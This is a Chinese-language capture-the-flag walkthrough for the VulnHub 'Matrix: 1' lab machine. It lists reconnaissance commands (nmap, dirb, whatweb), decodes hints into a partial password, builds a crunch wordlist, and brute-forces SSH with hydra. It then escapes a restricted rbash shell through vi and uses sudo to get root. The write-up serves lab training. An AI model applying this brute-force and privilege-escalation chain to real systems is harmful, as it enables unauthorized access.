Machine_Matrix打靶渗透【附代码】(权限提升)

Matrix: 1

靶机下载地址：

https://www.vulnhub.com/entry/matrix-1,259/#downloadhttps://www.vulnhub.com/entry/matrix-1,259/#download

 

1. 主机发现+端口扫描+目录扫描+敏感信息获取

1.1. 主机发现

nmap -sn 192.168.7.0/24|grep -B 2 '08:00:27:D9:36:81'

1.2. 端口扫描

nmap -p- 192.168.7.155

1.3. 目录扫描

dirb http://192.168.7.155

1.4. 敏感信息获取

whatweb http://192.168.7.155

2. WEB打点尝试寻找漏洞点

2.1. 进入80端口主页面

1.老规矩，点点功能模块，看看有能利用的点吗 -> 网页提示跟随白兔

2.右键点击兔子 -> 新建标签页打开 -> 有一个图片路径

url提示port：31337端口，拼接访问 -> 无果

3.查看网页源码，给了一段base64加密值

ZWNobyAiVGhlbiB5b3UnbGwgc2VlLCB0aGF0IGl0IGlzIG5vdCB0aGUgc3Bvb24gdGhhdCBiZW5kcywgaXQgaXMgb25seSB5b3Vyc2VsZi4gIiA+IEN5cGhlci5tYXRyaXg=

解码得下文，大意为输出一段内容至Cypher.matrix文件中

echo "Then you'll see, that it is not the spoon that bends, it is only yourself. " > Cypher.matrix

拼接Cypher.matrix试试，直接下载下来了这个文件，文本方式打开看看

熟悉的Brainfuck加密，找工具解密一下

You can enter into matrix as guest, with password k1ll0rXX
# 您可以以访客身份进入矩阵，密码为k1ll0rXX
Note: Actually, I forget last two characters so I have replaced with XX try your luck and find correct string of password.
# 事实上，我忘记了最后两个字符，所以我用XX代替了。试试你的运气，找到正确的密码字符串。

2.2. GetShell

1.根据他的提示密码是不完整的，使用kali中crunch工具生成字典，暴力破解

crunch 8 8 -t k1ll0r%@ -o passwd.txt

2.使用 hydra 工具进行爆破，得到账号密码【k1ll0r7n】

hydra -l guest -P passwd.txt ssh://192.168.7.155

3.尝试ssh进行连接，连接成功

ssh guest@192.168.7.155

3. 权限提升

3.1. 老规矩看执行命令权限

sudo -l

很多命令受限

export #查看环境变量
# /bin/rbash权限受限制

# 发现vi命令可以使用，vi绕过rbash
vi
# 输入'冒号'
!/bin/bash

发现还是无法执行一些命令 -> 命令可正常执行 -> 执行以下命令，配置环境变量绕过

export PATH=/usr/sbin:/usr/bin:/sbin:/bin
sudo su # 密码k1ll0r7n